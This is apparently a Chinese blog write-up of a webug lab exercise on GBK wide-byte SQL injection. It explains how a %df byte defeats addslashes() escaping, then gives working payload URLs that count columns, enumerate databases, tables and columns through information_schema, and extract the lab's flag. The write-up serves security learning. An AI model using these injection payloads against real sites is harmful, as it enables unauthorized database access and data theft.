标签:esc from nio man lin sele 图片 范围 data
0x00 前言
GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。
addslashes() 函数会对括号里 (‘) 、(")、 (\)、 (NULL)、的四个字符添加反斜杠并将其返回。
Mysql有一个特性,在进行GBK编码时会将两个字符认为一个汉字(前提是第一个字符的ASCII大于128才能达到汉字范围)。
如果SQL输入经过了addslashes() 函数处理,我们输入‘ 时 会变成 \’。一般绕过的方法有两种
1. 将 \‘ 前面的 斜杠 进行转义 \\‘ 这样单引号就能绕过,逃逸出来
2. 想办法去掉前面的\
0x01 实践1
看到网址尝试在后面添加单引号,但是页面并没有什么变化,因为已经知道是宽字节注入,所以添加%df‘
页面报错了:
可以看到单引号 ‘ 变成了 \‘ %df没有显示出来,但我们知道%df转化成10进制是223 大于128,与后面反斜杠 \ 的16进制%5c 合成一个汉字,使得单引号逃逸出来。这也是上面说的第2个方法。
0x02 实践2
我们再添加 %df\‘ 会变成 %df5c5c27 %df5c 会组成一个汉字 而%5c5c会进行转义 后面的单引号逃逸
我们再添加 %dfdf‘ 会变成 %dfdf5c27 %dfdf 会组成一个汉字(至少是个宽字节) 而%5c与%27依旧是 \‘
0x03 注入
剩下过程与前面几关类似
接下来判断字段数 判断结果为2
http://localhost/control/sqlinject/width_byte_injection.php?id=1%df‘ order by 2--+
爆出数据库名字
http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df‘ union select 1,schema_name from information_schema.schemata --+
数据库名字:information_schema,challenges,mysql,performance_schema,security,test,webug,webug_sys,webug_width_byte
爆数据库webug下的表
http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df‘ union select 1,table_name from information_schema.tables where table_schema=0x7765627567--+
webug下的表:data_crud,env_list,env_path,flag,sqlinjection,user,user_test
爆env_list的列
http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df‘ union select 1,column_name from information_schema.columns where table_name=0x656e765f6c697374--+
env_list的表里有:id,envName,envDesc,envIntegration,delFlag,envFlag,level,type
爆本题flag
http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df‘ union select 1,envFlag from webug.env_list where id=6 --+
flag:dfsadfsadfas
转载记得标明来源:https://www.cnblogs.com/yuuki-aptx/
标签:esc from nio man lin sele 图片 范围 data
原文地址:https://www.cnblogs.com/yuuki-aptx/p/10548307.html